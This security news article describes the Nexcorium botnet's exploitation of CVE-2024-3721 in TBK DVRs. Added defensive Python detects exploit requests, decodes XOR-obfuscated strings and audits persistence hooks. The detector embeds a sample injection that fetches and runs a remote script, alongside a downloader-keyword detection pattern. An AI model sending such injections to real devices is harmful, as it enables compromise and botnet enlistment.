
Hackers Exploit CVE-2024-3721 To Deploy Nexcorium Malware On TBK DVRs

Internet of Things (IoT) devices remain highly vulnerable targets for cyberattacks due to poor security configurations and delayed patching.

Recently, security researchers at Fortinet’s FortiGuard Labs discovered a new threat campaign exploiting a known vulnerability, CVE-2024-3721, in TBK digital video recorders (DVRs).

The attackers are using the flaw to deliver Nexcorium, a new variant of the Mirai botnet malware, and to enrol the compromised recorders in a botnet used for distributed denial-of-service (DDoS) attacks.

Infection Chain and Botnet Operations

The attack begins with exploitation of CVE-2024-3721, an OS command injection vulnerability in the web interface of TBK DVR models such as the DVR-4104 and DVR-4216.

A crafted request injects a command that downloads and runs a malicious shell script. FortiGuard Labs noted that the exploit traffic carries a custom HTTP header, “X-Hacked-By: Nexus Team – Exploited By Erratic”, which is also a convenient detection artifact in its own right.

That header led the researchers to attribute the campaign to a little-known group calling itself the “Nexus Team”. Since a self-declared banner is trivial to spoof, the attribution rests on the group's own claim rather than on independent evidence.

Exploit traffic via CVE-2024-3721 (Source: Fortinet)
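As an added example (not part of the Fortinet report or of this article), the following Python flags captured HTTP requests that match the exploitation pattern described above: a request to the DVR's vulnerable endpoint whose `mdb`/`mdc` parameters carry shell syntax, or any request carrying the attacker's `X-Hacked-By` header. The endpoint and parameter names are taken from the public CVE-2024-3721 record; the sample requests, addresses and the injected payload are constructed for illustration, not observed traffic.

```python
"""Flag HTTP requests matching the CVE-2024-3721 exploitation pattern.

Added example; the sample requests below are constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Vulnerable endpoint and injectable parameters, as named in the public CVE record.
VULN_PATH = "/device.rsp"
INJECTABLE = ("mdb", "mdc")
# Shell separators or downloader commands have no place in a DVR query parameter.
SHELL_CONTENT = re.compile(r"[;&|`$]|\b(?:wget|curl|tftp|busybox|chmod|sh)\b")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, decoded query and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query),  # percent-decoding happens here
        "headers": headers,
    }


def classify(raw: str) -> list[str]:
    """Return a list of findings for one request (empty means nothing matched)."""
    req = parse_request(raw)
    findings = []
    if req["path"] == VULN_PATH:
        for param in INJECTABLE:
            for value in req["query"].get(param, []):
                if SHELL_CONTENT.search(value):
                    findings.append(
                        f"CVE-2024-3721 pattern: shell content in {param}={value!r}"
                    )
    tag = req["headers"].get("x-hacked-by")
    if tag:
        findings.append(f"attacker header X-Hacked-By: {tag}")
    return findings


# Constructed samples; 192.0.2.0/24 and 203.0.113.0/24 are documentation ranges.
EXPLOIT_REQUEST = "\r\n".join([
    "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos"
    "&mdc=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F203.0.113.10%2Fdvr%3Bsh%20dvr HTTP/1.1",
    "Host: 192.0.2.20",
    "User-Agent: Mozilla/5.0",
    "X-Hacked-By: Nexus Team - Exploited By Erratic",
    "",
    "",
])
BENIGN_REQUEST = "\r\n".join([
    "GET /login.rsp?user=admin HTTP/1.1",
    "Host: 192.0.2.20",
    "User-Agent: Mozilla/5.0",
    "",
    "",
])

if __name__ == "__main__":
    for label, sample in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, classify(sample) or "clean")
```

The path check keeps the rule specific to the vulnerable handler, while the header check is independent of the endpoint, so it still fires if the group reuses its banner against other products.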

Once the downloader script runs, it fetches malware binaries built for several architectures, including ARM and x86-64, so that whichever Linux-based device executed the script receives a binary it can run.

Nexcorium shares its core structure with other Mirai variants and is organised around three main modules: a watchdog, a scanner and an attacker.

To spread further, the malware brute-forces Telnet logins using a hard-coded list of weak default credentials. It also carries an older exploit, CVE-2017-17215, a remote code execution flaw in Huawei HG532 routers, which extends its reach to a second class of devices.

Downloader shell script “dvr” (Source: Fortinet)

Persistence Mechanisms and Mitigation

To keep long-term access to a compromised host, Nexcorium uses several persistence mechanisms. After infection, the malware copies itself into a hidden directory.

XOR-encoded configuration with the key 0x13 (Source: Fortinet)
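The figure above shows Nexcorium's configuration obfuscated with a single-byte XOR key. The block below is an added example, not Fortinet's code or a real Nexcorium sample: it decodes such a string table and goes one step beyond the page by recovering an unknown single-byte key from a crib such as `/bin/busybox`, a string Mirai-family bots routinely keep in their tables. The sample strings, their NUL-separated layout and the resulting blob are constructed assumptions.

```python
"""Decode a Mirai-style string table obfuscated with a single-byte XOR key.

Added example; SAMPLE_STRINGS is constructed and is not Nexcorium's real table.
"""
from typing import Optional

PRINTABLE = set(range(0x20, 0x7F))  # printable ASCII, no control characters


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def extract_strings(blob: bytes, key: int, min_len: int = 4) -> list[str]:
    """Decode blob and return the NUL-separated entries that are clean ASCII."""
    entries = []
    for chunk in xor_bytes(blob, key).split(b"\x00"):
        if len(chunk) >= min_len and all(c in PRINTABLE for c in chunk):
            entries.append(chunk.decode("ascii"))
    return entries


def recover_key(blob: bytes, crib: bytes) -> Optional[int]:
    """Brute-force the single-byte key using a string the table is expected to hold.

    A wrong key can still yield mostly printable output, so a crib (known
    plaintext) is more reliable than scoring printability alone.
    """
    for key in range(256):
        if crib in xor_bytes(blob, key):
            return key
    return None


# Constructed sample: NUL-separated entries (a simplification of the real table
# layout) encoded with the key 0x13 named in the figure.
SAMPLE_STRINGS = [b"/bin/busybox", b"/etc/inittab", b"/etc/rc.local",
                  b"root", b"admin", b"123456"]
SAMPLE_BLOB = xor_bytes(b"\x00".join(SAMPLE_STRINGS) + b"\x00", 0x13)

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB, b"/bin/busybox")
    print(f"recovered key: {key:#04x}")
    for entry in extract_strings(SAMPLE_BLOB, key):
        print(" ", entry)
```

Because a single-byte XOR preserves byte positions, the same approach works on a raw binary: run recover_key over the .data or .rodata section and then extract_strings with the key it returns.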

It establishes start-up persistence through four methods:

  • Init configuration: it adds an entry to /etc/inittab so that init relaunches the malicious process whenever it exits.
  • Startup scripts: it appends itself to /etc/rc.local so that it runs on every boot.
  • Systemd services: it searches the common systemd unit directories and writes a service file so that systemd starts it automatically.
  • Cron jobs: it installs crontab entries that relaunch it on a schedule, so the bot comes back after a reboot even if the other hooks are removed.

After securing its foothold, Nexcorium deletes its original executable to hinder analysis. The running process survives the unlink, so on a live host /proc/<pid>/exe still points at the removed file and readlink reports it with a “(deleted)” suffix, which is a useful triage signal.
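The following Python is an added triage script, not part of the Fortinet analysis, that checks the four persistence points just described against a mounted filesystem image (or a live root) and, on a live Linux host, lists processes whose binary has been unlinked. The suspicious-path heuristic, the hidden `/.x/dvr` path and the file contents written by build_sample_root() are constructed assumptions, not Nexcorium's actual artifacts.

```python
"""Offline triage for inittab, rc.local, systemd and cron persistence.

Added example; the sample tree built below is constructed, not a real infection.
"""
import glob
import os
import re
import tempfile

# Locations a legitimate daemon should not be launched from: hidden directories
# and world-writable scratch space. Extend per environment.
SUSPICIOUS_PATH = re.compile(r"/\.[^/\s]+|/tmp/|/dev/shm/|/var/tmp/")


def _lines(path: str):
    """Yield non-empty, non-comment lines of a file; silently skip unreadable files."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                stripped = line.strip()
                if stripped and not stripped.startswith("#"):
                    yield stripped
    except OSError:
        return


def audit_persistence(root: str) -> list[dict]:
    """Return entries in the four start-up hooks that launch a suspicious path."""
    hits = []

    def flag(kind: str, path: str, entry: str) -> None:
        if SUSPICIOUS_PATH.search(entry):
            hits.append({"kind": kind, "file": path, "entry": entry})

    # 1. /etc/inittab: "id:runlevels:action:process"; respawn relaunches on exit.
    inittab = os.path.join(root, "etc/inittab")
    for line in _lines(inittab):
        fields = line.split(":", 3)
        if len(fields) == 4 and fields[2] in ("respawn", "once", "sysinit"):
            flag("inittab", inittab, line)

    # 2. /etc/rc.local: every command line runs at boot.
    rc_local = os.path.join(root, "etc/rc.local")
    for line in _lines(rc_local):
        flag("rc.local", rc_local, line)

    # 3. systemd units: only the ExecStart= lines matter for what gets launched.
    for pattern in ("etc/systemd/system/*.service", "lib/systemd/system/*.service",
                    "usr/lib/systemd/system/*.service"):
        for unit in glob.glob(os.path.join(root, pattern)):
            for line in _lines(unit):
                if line.startswith("ExecStart"):
                    flag("systemd", unit, line)

    # 4. cron: system crontab, drop-ins and per-user spools.
    for pattern in ("etc/crontab", "etc/cron.d/*", "var/spool/cron/crontabs/*",
                    "var/spool/cron/*"):
        for tab in glob.glob(os.path.join(root, pattern)):
            if os.path.isfile(tab):
                for line in _lines(tab):
                    flag("cron", tab, line)
    return hits


def deleted_executables(proc: str = "/proc") -> list[tuple[int, str]]:
    """Live Linux hosts only: processes whose binary was unlinked after launch."""
    found = []
    for entry in glob.glob(os.path.join(proc, "[0-9]*")):
        try:
            target = os.readlink(os.path.join(entry, "exe"))
        except OSError:
            continue  # no permission, kernel thread, or not Linux
        if target.endswith(" (deleted)"):
            found.append((int(os.path.basename(entry)), target))
    return found


def build_sample_root() -> str:
    """Constructed filesystem tree with one hook of each kind (hypothetical paths)."""
    root = tempfile.mkdtemp()
    files = {
        "etc/inittab": "::sysinit:/etc/init.d/rcS\n"
                       "ttyS0::respawn:/sbin/getty -L ttyS0 115200\n"
                       "::respawn:/.x/dvr\n",
        "etc/rc.local": "#!/bin/sh\n/.x/dvr &\nexit 0\n",
        "etc/systemd/system/dvr.service": "[Unit]\nDescription=dvr\n[Service]\n"
                                          "ExecStart=/.x/dvr\n[Install]\n"
                                          "WantedBy=multi-user.target\n",
        "var/spool/cron/crontabs/root": "@reboot /.x/dvr\n*/5 * * * * /.x/dvr\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in audit_persistence(build_sample_root()):
        print(f"{hit['kind']:8} {hit['file']}: {hit['entry']}")
    print("deleted binaries:", deleted_executables() or "none")
```

Run audit_persistence("/") on a live host or point it at the mount point of an extracted firmware or disk image; the legitimate getty and rcS entries in the sample are not flagged, which is the point of matching on the launched path rather than on the hook itself.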

To defend against Nexcorium, Fortinet's researchers recommend immediate mitigation.

Network administrators should ensure that all IoT devices, particularly TBK DVRs and legacy routers, run the latest firmware. Default passwords must be changed, and Telnet disabled where it is not required, to remove the brute-force path the bot relies on.

Organisations should also deploy network filtering to block communication with known malicious C2 domains and use threat intelligence services to detect suspicious scanning behaviour before an infection takes hold.


The post Hackers Exploit CVE-2024-3721 To Deploy Nexcorium Malware On TBK DVRs appeared first on Cyber Security News.
